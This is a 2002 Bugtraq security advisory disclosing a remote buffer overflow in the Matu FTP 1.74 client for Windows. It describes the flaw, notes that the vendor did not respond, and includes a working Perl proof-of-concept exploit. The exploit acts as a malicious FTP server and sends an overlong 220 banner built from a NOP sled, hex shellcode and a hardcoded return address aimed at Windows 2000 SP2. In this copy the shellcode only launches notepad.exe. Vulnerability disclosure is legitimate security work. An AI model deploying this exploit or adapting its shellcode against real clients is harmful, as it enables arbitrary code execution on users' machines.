[25213] in bugtraq
Matu FTP remote buffer overflow vulnerability
daemon@ATHENA.MIT.EDU (Kanatoko)
Tue Apr 23 00:01:30 2002
Message-ID: <20020422093546.22607.qmail@securityfocus.com>
Date: Mon, 22 Apr 2002 18:45:46 +0900
From: Kanatoko <anvil@jumperz.net>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Matu FTP remote buffer overflow vulnerability
/*---------------------------
Description
---------------------------*/
Matu FTP is a Japanese FTP client software for Win32 Platform.
We found an exploitable buffer overflow problem in Matu FTP Version 1.74.
The buffer overflow occurs when a long string like
220 AAAAAAAAAAAAAAAAA.....AAAAAAAAAAAAAAA<CR><LF>
is received by Matu FTP in the beginning of an FTP session.
This vulnerability allows malicious FTP server to execute
an arbitrary code on client hosts.
/*---------------------------
Vendor Status
---------------------------*/
Notified with no response
/*---------------------------
POC
---------------------------*/
This exploit code is invoked as an FTP server through inetd.
#!/usr/local/bin/perl
#------------------------------------------------------
# Matu Ftp Version 1.74 exploit for Windows2000 Professional (SP2)
# ( run under inetd )
# written by Kanatoko <anvil@jumperz.net>
# http://www.jumperz.net/
#------------------------------------------------------
$|=1;
#egg written by UNYUN (http://www.shadowpenguin.org/)
$egg = "\xEB\x27\x8B\x34\x24\x33\xC9\x33\xD2\xB2";
$egg .= "\x0B\x03\xF2\x88\x0E\x2B\xF2\xB8\xAF\xA7";
$egg .= "\xE6\x77\xB1\x05\xB2\x04\x2B\xE2\x89\x0C";
$egg .= "\x24\x2B\xE2\x89\x34\x24\xFF\xD0\x90\xEB";
$egg .= "\xFD\xE8\xD4\xFF\xFF\xFF";
$egg .= "notepad.exe";
#egg_address = 0x0012F43C
$buf = "\x90" x 217;
$buf .= $egg;
$buf .= "A" x 2;
$buf .= "\x3C\xF4\x12\x00";
$buf .= "B" x 80;
print "220 $buf\r\n";
--
#sorry for the bad english
Kanatoko <anvil@jumperz.net>
http://www.jumperz.net/(Japanese)
